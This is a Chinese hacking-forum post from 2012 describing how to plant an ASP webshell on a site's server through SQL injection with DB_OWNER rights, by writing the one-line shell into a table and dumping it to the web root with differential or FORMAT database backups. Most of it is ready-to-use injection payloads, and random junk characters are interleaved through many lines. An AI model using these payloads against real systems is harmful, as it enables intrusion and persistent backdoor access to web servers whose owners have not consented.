找回密码
 立即注册
查看: 2951|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:
- O# T0 t' P# F7 k" j) \. ]( b# L/ b1 r- c: A- ~1 l
减少备份文件大小,得到可执行的webshell成功率提高不少
6 p. z' K! k% i5 R+ v, K一利用差异备份
4 b. d1 R; G6 J. S2 `加一个参数WITH DIFFERENTIAL
( T  Y" u* C# g8 T) |+ P- e0 j7 \+ j7 k
1
. _6 d: I1 l" _2
3 U* u* W/ x) D+ _! X3) ~/ I1 z: j" ^3 K5 Z/ t
4, O- X# |9 C/ O* h3 J
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 p5 m7 G/ y# R; O  vcreate table [dbo].[xiaolu] ([cmd] [image]);. ]5 z# Y$ U1 |- g( \$ u
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
- X" W7 s% r" \* m: r. Y9 ?declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL $ g' E& B6 V* {& U, g6 u

2 y2 X) ~; ~8 b' j1 }6 O二利用完全FORMAT
! j: M) k5 |3 R加一个参数WITH FROMAT
. A' Q  h1 E7 A( J有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
' V/ g7 C8 z- E: n! q  _$ ?- g7 I  _3 `* C
1
; @# d5 Q/ q1 i- I, g2
# e  }8 w2 J" ^1 i# @+ b3
' d. d4 l$ h3 a& D4
1 a( U" r+ w$ l7 U% t! L* R declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
( W" k' W  Q4 m8 q3 v% S3 U7 pcreate table [dbo].[xiaolu] ([cmd] [image]);
% [8 N" u4 J9 m5 P* W9 N% finsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)* b4 \# r1 v6 {6 d4 O5 o
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
- H- }: J' F' I& `$ b% B! j) N# x) ]
2 ?) v" ^4 g6 V  `总的来说就是那么简单几句,下面以备份数据库model为例子. B' s" h/ l% j) {/ ]" P
1
4 l, D) P" K. k$ ]& a* c0 @; i0 W, V6 m% E) C
1* R/ j" M) O% i4 v+ |# O
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') 9 U( \4 Q" w6 s7 ~2 _
+ Z/ i" k( q) h
2# W: f3 J+ h* R! z! x6 A- E
, A0 {* h4 `4 U8 Y
1
& h/ C8 K7 o/ ?+ C id=1;backup database model to disk='你的路径‘ with differential,format;-- 3 h, N4 \+ E; T7 v9 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表